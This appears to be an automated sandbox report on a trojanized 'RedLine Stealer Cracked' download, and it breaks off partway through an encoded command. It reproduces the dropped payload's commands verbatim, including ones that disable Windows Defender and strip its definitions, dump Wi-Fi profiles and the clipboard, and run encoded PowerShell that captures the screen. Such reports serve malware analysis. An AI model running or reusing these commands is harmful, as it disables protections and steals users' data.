pid Process 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 5096 7zG.exe 1056 7zFM.exe 1936 7zG.exe 2972 7zG.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2296 builder.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4780 wrote to memory of 2612 4780 chrome.exe 82 PID 4780 wrote to memory of 2612 4780 chrome.exe 82 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 2864 4780 chrome.exe 83 PID 4780 wrote to memory of 5648 4780 chrome.exe 84 PID 4780 wrote to memory of 5648 4780 chrome.exe 84 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85 PID 4780 wrote to memory of 5636 4780 chrome.exe 85
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://zelenka.guru/proxy.php?link=https%3A%2F%2Fgofile.io%2Fd%2FrrVkK9&hash=aee71227bcd2e07805a068cfb8b0c4b21⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab53fab58,0x7ffab53fab68,0x7ffab53fab782⤵PID:2612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:22⤵PID:2864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:5648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2236 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:5636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:12⤵PID:5356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:12⤵PID:4888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4540 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:12⤵PID:1488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4684 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:12⤵PID:3216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:1060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:2820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5044 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:12⤵PID:2064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:5372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4520 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:1884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:4472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵PID:4604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:82⤵
- Modifies registry class
PID:3824
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:4852
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5672
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap28523:108:7zEvent73011⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5096
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RedLine Stealer Cracked.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:1056
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\RedLine Stealer Cracked\" -spe -an -ai#7zMap11500:108:7zEvent171841⤵
- Suspicious use of FindShellTrayWindow
PID:1936
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap1643:108:7zEvent288351⤵
- Suspicious use of FindShellTrayWindow
PID:2972
-
C:\Users\Admin\Downloads\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe"C:\Users\Admin\Downloads\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:936 -
C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3448
-
-
C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe"C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5580 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"3⤵
- Executes dropped EXE
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe'"5⤵PID:1516
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:2640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1264
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1920
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:1756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:5700
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:4208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵PID:5776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2060
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2936
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵PID:5112
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:3216
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:1240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUA